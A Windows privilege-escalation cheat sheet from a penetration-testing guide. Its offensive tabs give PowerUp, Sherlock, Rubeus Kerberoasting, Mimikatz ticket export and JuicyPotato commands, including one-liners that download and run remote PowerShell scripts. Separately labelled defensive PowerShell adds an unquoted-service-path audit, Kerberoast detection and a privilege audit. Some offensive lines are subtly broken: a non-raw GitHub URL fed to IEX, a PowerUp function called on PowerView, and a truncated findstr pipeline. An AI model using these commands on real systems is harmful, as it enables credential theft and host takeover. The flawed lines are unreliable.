# 02 Privileges Escalation

{% tabs %}
{% tab title="Basic" %}

```
# Rubeus: see the Kerberoast tab
# PowerShellMafia / PowerSploit (PowerView, PowerUp)
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
powershell.exe -c "Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks"
powershell.exe -c "Import-Module C:\Users\Public\Get-System.ps1; Get-System"
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1'); Invoke-AllChecks -Command 'start powershell.exe'"

# Sherlock
https://github.com/rasta-mouse/Sherlock
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1'); Find-AllVulns -Command 'start powershell.exe'"

# Unquoted service paths (auto-start services outside C:\Windows)
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v
```
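
Defender-side version of the unquoted-path check above, added here as an example and not part of the original cheat sheet or any of the tools it lists. It audits every service whose binary path is unquoted and contains a space, reports which of the directories the service control manager would probe are writable by low-privileged principals, and can quote the path in place (`-WhatIf` shows the change first). Assumptions: run from an elevated prompt on the host being audited; the executable ends in `.exe`; the list of "risky" identities is illustrative and should be extended for your environment.

```powershell
# Added example, not from the original page. Audit + remediation for unquoted service paths.

function Get-UnquotedServicePath {
    [CmdletBinding()]
    param()

    # Principals whose write access on a probed directory makes the issue actionable (illustrative list).
    $riskyIdentities = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    # FileSystemRights.Write plus the generic bits some ACEs carry (GENERIC_WRITE, GENERIC_ALL).
    $writeBits = [int][System.Security.AccessControl.FileSystemRights]::Write -bor 0x40000000 -bor 0x10000000

    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $path = $_.PathName
        if (-not $path -or $path.StartsWith('"') -or $path -notmatch '\.exe') { return }
        $exe = ($path -split '\.exe', 2)[0] + '.exe'   # executable portion only, arguments dropped
        if ($exe -notmatch ' ') { return }               # no space: nothing for the SCM to mis-resolve
        if ($exe -like 'C:\Windows\*') { return }        # same exclusion the wmic one-liner applies

        # Each space yields a candidate the SCM tries before the real binary, e.g.
        # C:\Program Files\My App\svc.exe -> C:\Program.exe, then C:\Program Files\My.exe
        $parts = $exe -split ' '
        $writableDirs = @()
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = $parts[0..($i - 1)] -join ' '
            $dir = Split-Path -Path $candidate -Parent
            if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { continue }
            $acl = Get-Acl -LiteralPath $dir -ErrorAction SilentlyContinue
            if (-not $acl) { continue }
            foreach ($ace in $acl.Access) {
                if ($ace.AccessControlType -eq 'Allow' -and
                    $riskyIdentities -contains $ace.IdentityReference.Value -and
                    (([int]$ace.FileSystemRights -band $writeBits) -ne 0)) {
                    $writableDirs += $dir
                    break
                }
            }
        }

        [pscustomobject]@{
            Name         = $_.Name
            StartMode    = $_.StartMode
            RunAs        = $_.StartName
            PathName     = $path
            WritableDirs = ($writableDirs | Select-Object -Unique) -join ';'
        }
    }
}

function Repair-UnquotedServicePath {
    # Quotes the executable portion of ImagePath, preserving arguments and the registry value type.
    [CmdletBinding(SupportsShouldProcess)]
    param([Parameter(Mandatory, ValueFromPipelineByPropertyName)][string]$Name)
    process {
        $key = "HKLM:\SYSTEM\CurrentControlSet\Services\$Name"
        $image = (Get-ItemProperty -Path $key -Name ImagePath).ImagePath
        if (-not $image -or $image.StartsWith('"') -or $image -notmatch '\.exe') { return }
        $exe = ($image -split '\.exe', 2)[0] + '.exe'
        $rest = $image.Substring($exe.Length)
        $fixed = '"' + $exe + '"' + $rest
        $kind = (Get-Item -Path $key).GetValueKind('ImagePath')
        if ($PSCmdlet.ShouldProcess($Name, "Set ImagePath to $fixed")) {
            Set-ItemProperty -Path $key -Name ImagePath -Value $fixed -Type $kind
        }
    }
}

# Usage:
#   Get-UnquotedServicePath | Where-Object WritableDirs | Format-Table -AutoSize
#   Get-UnquotedServicePath | Repair-UnquotedServicePath -WhatIf
```

Services with a non-empty `WritableDirs` column are the ones to fix first; a quoted path (or tightening the ACL on the probed directory) closes the issue, and the service needs a restart to pick up the new `ImagePath`.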

{% endtab %}

{% tab title="Kerberoast" %}

```
.\Rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234

# List accounts with SPNs
setspn.exe -t evil.corp -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
cscript.exe GetUserSPNs.vbs

# List cached tickets
Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"

# Request tickets
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

# Request tickets remotely
python GetUserSPNs.py -request ECORP/morph3:supersecurepassword@127.0.0.1

# Extract tickets
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"
Invoke-Mimikatz -Command '"kerberos::list /export"'

# Crack tickets
python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi
```
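
Detection counterpart for the Kerberoast tab, added here as an example and not code from the original page or from Rubeus, PowerSploit or Impacket. The requests above show up on the domain controller as Event ID 4769 service-ticket requests; a kerberoasting run typically asks for many user-account SPNs from one requester in a short window, usually with RC4 (encryption type `0x17`) so the ticket can be cracked offline. The function below pulls those events and groups them by requester and source address. Assumptions: run on a DC (or against a collector that has the Security log) with "Audit Kerberos Service Ticket Operations" enabled; the threshold and window are illustrative.

```powershell
# Added example, not from the original page. Flags bursts of RC4 TGS requests for user SPNs.

function Get-KerberoastCandidate {
    [CmdletBinding()]
    param(
        [int]$Hours = 24,
        [int]$MinDistinctServices = 5,              # illustrative threshold: one requester, many SPNs
        [string]$ComputerName = $env:COMPUTERNAME   # DC or log collector holding the Security log
    )

    $ms = $Hours * 3600000
    # XPath keeps the filtering on the log side: 4769, inside the window, RC4 ticket, successful.
    $xpath = "*[System[EventID=4769 and TimeCreated[timediff(@SystemTime) <= $ms]] " +
             "and EventData[Data[@Name='TicketEncryptionType']='0x17' and Data[@Name='Status']='0x0']]"

    $events = Get-WinEvent -ComputerName $ComputerName -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue

    $rows = foreach ($e in $events) {
        $x = [xml]$e.ToXml()
        $d = @{}
        foreach ($item in $x.Event.EventData.Data) { $d[$item.Name] = $item.'#text' }
        # Machine accounts ($) and krbtgt legitimately use RC4 in mixed environments; the tickets an
        # attacker wants to crack are those for user accounts that carry an SPN.
        if ($d.ServiceName -like '*$' -or $d.ServiceName -eq 'krbtgt') { continue }
        [pscustomobject]@{
            Time      = $e.TimeCreated
            Requester = $d.TargetUserName
            SourceIp  = $d.IpAddress -replace '^::ffff:', ''
            Service   = $d.ServiceName
        }
    }

    $rows | Group-Object Requester, SourceIp | ForEach-Object {
        $services = @($_.Group.Service | Sort-Object -Unique)
        if ($services.Count -ge $MinDistinctServices) {
            [pscustomobject]@{
                Requester = $_.Group[0].Requester
                SourceIp  = $_.Group[0].SourceIp
                First     = ($_.Group.Time | Measure-Object -Minimum).Minimum
                Last      = ($_.Group.Time | Measure-Object -Maximum).Maximum
                Services  = $services.Count
                Sample    = ($services | Select-Object -First 5) -join ', '
            }
        }
    }
}

# Usage: Get-KerberoastCandidate -Hours 6 -MinDistinctServices 3 | Format-Table -AutoSize
```

A single requester hitting many SPNs within minutes is the signal; a normal user touches a handful of services a day. On the hardening side, accounts that show up in the `Sample` column are the ones worth moving to long random passwords or group managed service accounts, and restricting to AES (`msDS-SupportedEncryptionTypes`) so RC4 tickets for them become an anomaly rather than the norm.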

{% endtab %}

{% tab title="Juicy Potato" %}

```
# Pick a CLSID for your Windows version from the CLSID list in the repo
https://github.com/ohpe/juicy-potato/releases
https://github.com/ohpe/juicy-potato/tree/master/CLSID

# Required privileges: SeAssignPrimaryTokenPrivilege, SeImpersonatePrivilege

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
```
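
Audit for the precondition above, added here as an example and not code from the original page or from the juicy-potato project. The technique only works from a context that already holds `SeImpersonatePrivilege` or `SeAssignPrimaryTokenPrivilege`, so the defensive question is which accounts on a host hold them beyond the Windows defaults (Administrators, SERVICE, LOCAL SERVICE and NETWORK SERVICE for impersonation; LOCAL SERVICE and NETWORK SERVICE for primary-token assignment). The function exports the effective user-rights assignment with `secedit`, resolves each SID and marks non-default holders. Assumptions: run elevated; the default SID lists reflect a stock Windows install and may differ on hardened builds.

```powershell
# Added example, not from the original page. Lists holders of the two token privileges potato-style abuse needs.

function Get-ImpersonationPrivilegeHolder {
    [CmdletBinding()]
    param()

    $cfg = Join-Path $env:TEMP ("secpol-{0}.inf" -f [guid]::NewGuid())
    # secedit writes the effective local policy; USER_RIGHTS limits the export to the [Privilege Rights] section.
    $null = secedit.exe /export /cfg $cfg /areas USER_RIGHTS /quiet
    if (-not (Test-Path -LiteralPath $cfg)) { throw "secedit export failed; run from an elevated prompt" }

    # Stock Windows defaults (assumption: unmodified install).
    $defaults = @{
        SeImpersonatePrivilege        = @('S-1-5-32-544', 'S-1-5-6', 'S-1-5-19', 'S-1-5-20')
        SeAssignPrimaryTokenPrivilege = @('S-1-5-19', 'S-1-5-20')
    }

    try {
        foreach ($line in Get-Content -LiteralPath $cfg) {
            if ($line -notmatch '^(SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege)\s*=\s*(.*)$') { continue }
            $priv = $matches[1]
            # Entries are "*<SID>" for SIDs or a bare account name, comma separated.
            foreach ($entry in ($matches[2] -split ',')) {
                $entry = $entry.Trim()
                if (-not $entry) { continue }
                $sid = $entry.TrimStart('*')
                $name = try {
                    ([System.Security.Principal.SecurityIdentifier]$sid).Translate([System.Security.Principal.NTAccount]).Value
                } catch { $entry }   # unresolvable or already a name: keep the raw entry
                [pscustomobject]@{
                    Privilege = $priv
                    Sid       = $sid
                    Account   = $name
                    IsDefault = $defaults[$priv] -contains $sid
                }
            }
        }
    } finally {
        Remove-Item -LiteralPath $cfg -ErrorAction SilentlyContinue
    }
}

# Usage: Get-ImpersonationPrivilegeHolder | Where-Object { -not $_.IsDefault } | Format-Table -AutoSize
```

Non-default holders are usually service identities such as IIS application pools or database services. Each of those is a foothold that skips the privilege-escalation step entirely, so they belong on the list of accounts whose compromise is treated as host compromise, and any that do not actually need the right should have it removed in the local or group policy user-rights assignment.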

{% endtab %}

{% tab title="Impersonating" %}

{% endtab %}
{% endtabs %}
